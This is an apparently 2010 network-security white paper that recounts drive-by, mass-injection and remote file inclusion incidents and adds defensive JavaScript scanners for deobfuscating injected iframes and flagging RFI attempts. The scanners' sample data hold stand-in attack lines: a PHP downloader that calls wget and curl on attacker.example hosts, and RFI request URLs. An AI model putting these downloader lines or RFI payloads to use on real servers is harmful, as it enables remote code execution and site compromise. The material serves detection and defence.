The "No Network is 100% Secure" series
- High Value Site Hacks, 2010 edition -
- In the news -
A White Paper
All rights reserved - may not be copied without permission
Easyrider LAN Pro, NOC Design Consultants
Vulnerability test: There is no malware on this page. However, if you
received three pop-up messages, your computer is vulnerable to java injection
drive-by exploitation. You might want to look into installing a safer browser!
If you did not receive three pop-up java alert messages when
you entered this page, that's a good sign that your browser is safe! Click on
the "How vulnerable am I?" button above to run one more (completely safe) test.
If a new window does NOT open, you are about as safe as you can be, at least until
these hackers come up with some new exploit. Note that you still need to have ALL
of your software (not just the operating system) patched to the latest level
since there are lots of other ways to pick up trojans and viruses besides visiting
a compromised, infected drive-by web site.
A recent study revealed that the average PC in the USA (including computers in a
corporate environment) has over a dozen current vulnerabilities. And remember,
these hackers only have to exploit one vulnerability and you're hacked! The same
study confirmed that there is an over-dependence on anti-virus software to keep
computers safe. This is an absolute fallacy! AV software is a 1999 solution to a
2009 problem. The drive-by attacks described in this white paper go largely
unnoticed by AV software. If your computer failed any of our vulnerability
tests, it's just a matter of when, not if, you get hacked.
Feedback: We value the opinion of IT professionals. If you have comments
about this series of white papers (too detailed, not detailed enough, helpful,
boring, or whatever) we would appreciate hearing from you. The information
contained in these white papers is intended to help IT Managers better
secure their networks. The more on-point our white papers are, the more useful
the information will be to our target audience. Thanks in advance!
Summary: A great many computer users pay little attention to the security
issues listed here. This is largely due to an [unfounded] reliance that they are
safe because they have a firewall and anti-virus software installed. The fact is
that the majority of the exploits mentioned here go largely unnoticed by firewalls
and AV software, which is why there are many millions of PCs currently infected and
functioning as bots for the criminal network. And if that wasn't bad enough, there
are some 60,000 legitimate web sites currently under the control of criminal
hackers with more added every day. If you provide any personal information on any
of these sites, you are just asking to have your identity stolen. Or worse. So any
time any web site requires that you create an account, *ALWAYS* use a throw-away
e-mail address and a throw-away password. Never, ever use a password that you also use
in any account that you don't want hacked. And if a web site wants your social security
number, drivers license number, mother's maiden name or anything that is frankly
none of their business, dump your browser session immediately. These sites are either
hacked or are operated by morons. In either case, a hasty exit is in order. There's more
hacking information here.
DirectShow vulnerability: This will likely become a popular form of exploit.
The DirectShow vulnerability is interesting for a number of reasons. Some of the
first pages to use this exploit in the wild were linked from phishing pages. The
phishing pages not only attempt to steal the visitors' login credentials, but also
silently redirected users to a malicious Web page hosting an exploit for the
DirectShow vulnerability (CVE-2009-1537). This malicious Web page loads a
corrupt .avi file that exploits the vulnerability and also loads some additional
malicious .dlls to facilitate reliable exploitation of the user's machine as a bot.
The malicious .dlls in turn download an encoded .exe payload that leads to
Trojan.Cipevas being loaded on to the victim's machine. Trojan.Cipevas then connects
back to the attackers' website and waits for further commands from the attacker.
The phishing component of this exploit is a fake Windows Live login screen. There is
currently (as of 6-19-09) no patch for the DirectShow vulnerability.
Details: The vulnerability exists in the code within Microsoft DirectX and can be
triggered by a specially crafted QuickTime media file. The attackers Web page will
try to play the malicious QuickTime file, not using the QuickTime player, but using
Windows Media Player instead. This will trigger the vulnerability and allow the
attacker to execute code on the visitor's computer. The vulnerable code exists in
quartz.dll. This vulnerability does not exist in Vista or Windows Server 2008.
Yet another JavaScript injection exploit: June 22, 2009. The official Web
site of the Ethiopian Embassy in Washington, D.C., has been compromised with malicious
code. The Web site has been injected with obfuscated JavaScript (the code is in an
Iframe). The code redirects users to sites that deliver malicious software that is
installed without needing any explicit user interaction. If your computer failed
the vulnerability tests on this page, your computer would likely be automatically
infected simply by visiting any one of the estimated 80,000 legitimate web sites like
this embassy site which have been compromised by hackers.
Nine-ball mass injection attack: Discovered on 6/03/2009. To date, over
40,000 legitimate Web sites have been compromised with obfuscated code that leads to
a multi-level redirection attack, ending in a series of drive-by exploits that if
successful install a trojan downloader on the user's machine.
The obfuscation code injected into these legitimate Web sites is somewhat random, but
the deobfuscation algorithm is consistent amongst all the infections. The algorithm
uses the JavaScript method "String.fromCharCode" to convert a chunk of decimal values
to a string. The string obtained after deobfuscation is an iframe that eventually
leads to an exploit site. After redirection, the exploit payload site returns highly
obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting
MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits
targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a
Trojan dropper with low AV detection rate. This dropper drops a dll with the name
SOCKET2.DLL to Windows' system folder. This file is used to steal user information.
The malicious PDF file, served by the exploit site, also has a very low AV detection
rate. This exploit is also known as ninetoraq.
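The String.fromCharCode decoding step described above can be reversed statically, so a webmaster can see what an injected block hides without ever executing it. The JavaScript below is an added example written for this page; it is not code from the original white paper or from the Nine-ball injection itself. The injected script it scans is constructed inline, and the host name redirector.example is a placeholder.

```javascript
// Added example (not from the original white paper): statically recover the iframe
// hidden behind a String.fromCharCode(...) chain, the deobfuscation step the
// Nine-ball injection relied on, without evaluating the script or touching the DOM.

// Constructed sample: the iframe an attacker would hide (placeholder host), and the
// obfuscated <script> block as it would appear in a compromised page.
const HIDDEN_IFRAME =
  '<iframe src="http://redirector.example/go.php" width="0" height="0"></iframe>';
const SAMPLE_INJECTION =
  '<script>document.write(String.fromCharCode(' +
  Array.from(HIDDEN_IFRAME, ch => ch.charCodeAt(0)).join(',') +
  '))</script>';

// Find every String.fromCharCode(...) call whose arguments are a plain list of
// decimal values and decode that list directly.
function decodeFromCharCodeChunks(source) {
  const re = /String\.fromCharCode\s*\(\s*([0-9\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const codes = m[1]
      .split(',')
      .map(s => Number(s.trim()))
      .filter(n => Number.isInteger(n));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Pull the src of every iframe out of decoded text so the redirect target can be
// blocked at the proxy or checked against a blocklist.
function extractIframeSources(text) {
  const re = /<iframe[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[1]);
  return out;
}

// Scan one page body. Legitimate pages also use String.fromCharCode, so a block is
// only called suspicious when the decoded text turns out to contain an iframe.
function scanPage(html) {
  const decoded = decodeFromCharCodeChunks(html);
  const iframes = decoded.flatMap(extractIframeSources);
  return { decoded, iframes, suspicious: iframes.length > 0 };
}

console.log(scanPage(SAMPLE_INJECTION));
```

Run it with node. The decoder deliberately handles only the plain decimal-list form the text describes; injections that build the argument list through arithmetic or string splitting need the list to be resolved first, which is why the decoded output is returned alongside the verdict rather than only a true/false flag.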
How embarrassing!: EWeek.com, a technology news site owned by Ziff Davis
Enterprise, in February, 2009 displayed an ad on its homepage masquerading as a
promotion for Lacoste, the shirt maker. The retailer hadn't placed the ad -- a hacker
had, to direct users to a Web site where harmful programs would be downloaded to
their computers, says Stephen Wellman, director of community and content for Ziff
Davis. Viruses can be incorporated directly within an ad, so that simply clicking on
the ad or visiting the site can infect a computer, or ads can be used to direct users
to a nefarious Web site that aims to steal passwords or identities.
The Web site of Fort William Mountain Bike World Cup 2009: has been hijacked
by attackers, and redirects users to rogue AV sites if they visit the site through
well-known search engines such as Google, Yahoo, and MSN. June 24, 2009.
This site has been injected by the Nine-Ball malicious code twice this month. Now,
the injected code has been cleaned but system control has been lost without the
administrator's knowledge. Once the attackers gained system control, they likely
made small changes to the configuration of the Web server to redirect any visitors
to rogue AV Web sites if arriving at the site via search engines. This is a clear
reminder to Web masters that a full examination of the whole system is necessary
after removing code injections.
British Government sites and schools hacked: London, June 15, 2009. Hackers
have taken over hundreds of government, school and university websites in Britain,
which direct users to pornographic websites. All the websites
were affected in different ways. Some contained inappropriate links on their home pages
and others contained drive-by malware. The hackers were apparently motivated by the
money they could earn from porn sites by boosting their traffic. The compromised web
sites also direct people to criminal web sites that sell products such as Viagra and
hardcore pornography. These sites will attempt to install viruses or malware on
people's computers for identity theft and various other purposes. It is possible
to see which sites have been hacked by typing into Google's search engine,
"inurl:ac.uk", in order to limit the search to British education websites and then
adding a phrase such as "buy viagra".
Beladen massive injection infections: June 11, 2009. The number of web sites
infected with malicious code inserted by the Beladen massive injection is now
estimated to be around 20,000 worldwide. The attackers who have taken control of
these legitimate business web sites are expected to upgrade their attack
drive-by malware very soon. However at this time, antivirus detection of the
existing malware is said to be low. If any of your users have visited any of these
sites, it is quite likely that your entire network is infected and you don't even
know it.
Canadian MSN Sympatico web site: has been compromised with malicious code on
June 10, 2009. The site's home page, index.php, was compromised and infected with an
obfuscated JavaScript iframe redirect to a known server of malware with an explicit
domain name.
Twitter: June 3, 2009. In our opinion, subscribing to social networking
sites such as Twitter is just asking for trouble. There are too many and too frequent
hacks, cracks and phishing goings-on there for any sane person to want to be part of it.
To list all of them would take up pages and pages of HTML, so suffice it to post
this: The latest malware attack on the social network links to a video hosted
on a site that installs scareware as victims watch the video. Duh.... if you liked
Kazaa's malware, you'll love Twitter.
June 18, 2009: We're seeing a wave of fake Twitter invitations that come carrying a
mass-mailing worm. The observed messages appear as if they have been sent from a
Twitter account; however, unlike a legitimate Twitter message, there is no invitation
URL present in the body. Instead, the user will see an attachment that appears as
a .zip file that purportedly contains an invitation card. Invitation Card.zip is the
name of the malicious attachment, and it is being identified as W32.Ackantta.B@mm,
which was first discovered in an e-card virus attack in February, 2009.
W32.Ackantta.B@mm is a mass-mailing worm that gathers email addresses from the
compromised computer and spreads by copying itself to removable drives and shared
folders.
Most companies restrict the personal use of company computers. Others
have policies that totally forbid personal computing on company time using company
equipment. Accessing Twitter, Facebook, Instant Messaging (IM) and so on
could be grounds for termination. And if your work PC gets infected because
you visited Twitter and the infection spreads throughout your company... well...
you can probably kiss your job good-bye. Any good IT guy will be able to trace
a virus back to its source so you really need to think about how important your
paycheck is to you before you go places that you shouldn't.
U.S. Army: May 30, 2009. An anti-American group of hackers has broken into
at least two of the US Army's critical web servers. This despite the advanced
security and antivirus software the Defense Department has in place. The group,
based in Turkey, calls itself "m0sted". They broke into servers at the Army's
McAlester Ammunition Plant in McAlester, Oklahoma on January 26, 2009 and previously
at the US Army Corps of Engineers' Transatlantic Center in Winchester, Virginia on
September 19, 2007. In the case of the McAlester Ammunitions plant breach, visitors
who were trying to access the plant's website found themselves redirected to a page
that featured a m0sted-led protest against climate change. In the Army Corps of
Engineers' attack, the hackers sent website visitors to www.m0sted.net, which at the
time contained anti-American and anti-Israeli messages and images. It is still not
clear as to whether the hackers managed to steal any sensitive data from the Army's
servers. According to officials, the hackers broke into the web servers by using an
SQL injection where they successfully exploited a security vulnerability in
Microsoft's SQL Server database. In the past, the same hackers performed similar
attacks on many other websites, including an attack in July 2008 against a site
operated by international computer security firm Kaspersky Lab.
The website of the Communist Party Of Britain: has been infected with
malicious code. June 6, 2009. Infection by the iFrame-F script coincided with local
and European election in the UK, marking a time when the minority party website
would have had far more visitors than normal. The affected file on the website is
associated with serving up Microsoft Silverlight script, suggesting an important
part of the site's multimedia environment was affected by the security breach.
The malicious code (inserted in a file called silverlight.js) serves up an iFrame
that points to a malicious Google-spoofing website in China. The Communist Party's
website infection is invisible to the naked eye, but is buried inside the code of a
plugin for these malicious webpages. The code is designed to deliver funky animation
and video effects to website visitors - but actually tries to invisibly download
malicious code from web servers based in China and Russia.
More embarrassment - another computer expert hacked!: June 25, 2009.
ZDNet's own Ryan Naraine reports in his Zero Day security blog that Mac evangelist
Guy Kawasaki's Twitter account was hijacked yesterday and was used in an attempt to
distribute malware to his almost 140,000 followers. The attack included a link to
what purported to be a "sex tape video free download" linked to Gossip Girls star
Leighton Meester. But, after a series of clicks, the end result was a malicious Trojan.
The payload at the end of the mal-Tweet was especially dangerous to both PCs and Macs.
In this case, the link would lead to a malicious website designed to infect both Macs
and PCs with a DNS changing Trojan which at the time of writing has low to non-existent
detection rates by security vendors. Luckily, the offending tweet reeked so badly of
SPAM that it probably limited the scope of its damage. If the hacker was a little more
nefarious and used the account to Tweet things in a more Kawasaki-like way,
i.e. "7 Sneaky (and useful) ways to use Twitter search" the damage could have been
much more extensive. In fact, Kawasaki's use of team-Twittering could have allowed a
rogue Tweeter to fly under the radar for quite a while. Now would probably be a good
time to change your Twitter password, just in case.
Remote File Inclusion (RFI) attacks:
One of the potentially most dangerous emerging security threats to the Internet isn't
even showing up on antivirus radar. Currently, an estimated 52,000 Websites are
infected with at least one exploit by RFI in a blended attack, and there are many more
that remain uncounted. None are being picked up by Google's Safe Browsing checks or
McAfee's Site Advisor, and only one of the top 40 antivirus vendors shows even a
potential problem. RFI is a hacking technique that allows attackers to remotely run
PHP code on victims' Websites. It is based on exploitation of vulnerabilities within
Web applications. RFI attacks are difficult to trace. The files are not usually tagged
as malware because they do not modify system files, registry keys, etc. They typically
target only Unix-based Web servers and use normal PHP or Unix commands. They do not
usually deploy things like malware packers, which makes them difficult to track by
antivirus vendors that rely on packers to find hostile code.
Also, the presence of an RFI identification file that has been maliciously added or
injected into a Website does not necessarily indicate a successful attack. It simply
indicates an attempt. But that attempt could be a major disaster waiting to happen, one
that could unravel a company's business.
RFI is historically used by hackers for defacing purposes. However, by loading their
shell onto a Web server hacked via RFI vulnerability hackers can also gain access to
customer data stored on the server. In blended attacks, RFI can be combined with an
XSA (Cross-Server Attack) to harm or even hijack a Web server. This whole area becomes
really dangerous to Web security, since attackers could use RFI as a botnet builder,
turning the Web server into a powerful DDoS (distributed denial of service) tool.
RFI Web server attacks also employ a type of "downloader" much like Windows malware,
which comprises a list of Unix commands that download additional bot code when executed.
Downloaders can be detected by writing a script/signature that looks for the presence
of the commands wget, curl, lwp-download, fetch, and get. Webmasters also need to
check that they are using the latest software versions and look for malicious redirects
within their Websites. A simple check is the obvious "txt?" since many RFI exploits end
with a question mark. Internet surfers should avoid clicking on oddball URLs
featuring .txt files. (Remember, such URLs can easily be masked with a "click here.")
Check out the following examples of URLs containing code to attack a Website:
hxxp://badware.com/shop/FX29ID.txt
hxxp://info.mywebsite.com/index.php?page=hxxp://rfi.badware.com/pawned/FX29ID.txt?
Again, note that such redirects can also be masked and inadvertently clicked on in
spam or from a compromised Website ad.
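The indicators listed in this section (a parameter value that is itself a remote URL, often ending in ".txt?", and injected files that call wget, curl, lwp-download, fetch or get) can be turned into a simple scanner a webmaster runs over access logs and suspicious files. The JavaScript below is an added example, not code from the original white paper; the access-log lines, the dropped-file contents and the attacker.example host names are constructed for the example.

```javascript
// Added example (not from the original white paper): two checks built from the RFI
// indicators the text names.
//  1. Requests whose parameter value is itself a remote URL (often ending ".txt?").
//  2. Files on the server carrying the "downloader" commands wget, curl,
//     lwp-download, fetch and get.
// Log lines, file contents and host names below are constructed for this example.

const DOWNLOADER_COMMANDS = ['wget', 'curl', 'lwp-download', 'fetch', 'get'];

// Constructed Apache-style access log lines (attacker.example is a placeholder host).
const SAMPLE_LOG = [
  '203.0.113.5 - - [11/Jun/2009:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1234',
  '203.0.113.9 - - [11/Jun/2009:10:00:02 +0000] "GET /index.php?page=http://rfi.attacker.example/pawned/FX29ID.txt? HTTP/1.1" 200 512',
  '198.51.100.7 - - [11/Jun/2009:10:00:03 +0000] "GET /shop/view.php?id=42 HTTP/1.1" 200 900',
  '198.51.100.8 - - [11/Jun/2009:10:00:04 +0000] "GET /gallery.php?file=ftp://files.attacker.example/shell.txt? HTTP/1.1" 500 0',
];

// Constructed contents of a file found on the server after a successful inclusion.
const SAMPLE_DROPPED_FILE =
  '<?php\n' +
  'system("cd /tmp; wget http://bots.attacker.example/b.txt; ' +
  'curl -O http://bots.attacker.example/c.txt; lwp-download http://bots.attacker.example/d.txt");\n';

// Return every query parameter whose value is a remote (http, https or ftp) URL.
function findRemoteIncludeParams(requestPath) {
  const qIndex = requestPath.indexOf('?');
  if (qIndex < 0) return [];
  const hits = [];
  for (const pair of requestPath.slice(qIndex + 1).split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    let value = pair.slice(eq + 1);
    try { value = decodeURIComponent(value); } catch (e) { /* keep raw value on bad %-escapes */ }
    if (/^(https?|ftp):\/\//i.test(value)) {
      hits.push({
        param: pair.slice(0, eq),
        target: value,
        // The trailing "?" is the "txt?" tell the white paper points out.
        txtWithQuestionMark: /\.txt\?$/i.test(value),
      });
    }
  }
  return hits;
}

// Scan access-log lines and report every request that carries a remote include.
function scanAccessLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    for (const hit of findRemoteIncludeParams(m[1])) alerts.push({ line, ...hit });
  }
  return alerts;
}

// Report which downloader commands appear in a file. Commands are matched as whole
// words so that "get" does not fire on "getenv" or "target" (or inside "wget").
function findDownloaderCommands(fileText) {
  const found = [];
  for (const cmd of DOWNLOADER_COMMANDS) {
    const re = new RegExp('(^|[^A-Za-z0-9_-])' + cmd + '(?![A-Za-z0-9_-])', 'm');
    if (re.test(fileText)) found.push(cmd);
  }
  return found;
}

console.log(scanAccessLog(SAMPLE_LOG));
console.log(findDownloaderCommands(SAMPLE_DROPPED_FILE));
```

Run it with node. A hit in the access log only shows an attempt, which matches the section's point that an RFI file on the site does not by itself prove a successful attack; the file scan is the follow-up that tells you whether something was actually written to the server, and both results should feed the full system examination the earlier Nine-ball case calls for.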
About the Author
Frank Saxton is a computer network security engineer and Easyrider LAN Pro principal. Home-based in Portland, Oregon, Frank has been designing remote diagnostic and network enterprise monitoring centers since the late 1970s. Prior to becoming a professional systems engineering consultant in 1990, Frank had a 20 year career in computer systems field engineering and field engineering management. Frank has a BSEE from Northeastern University and holds several certifications including Network General's Certified Network Expert (CNX). As a NOC design engineer and architect, Frank works regularly with enterprise-class monitoring tools such as HP Openview Operations, BMC Patrol and others. In his enterprise security audit work, Frank uses sniffers and other professional grade monitoring tools on a daily basis.
Last modified January 10, 2010
Copyright 1990-2010 Easyrider LAN Pro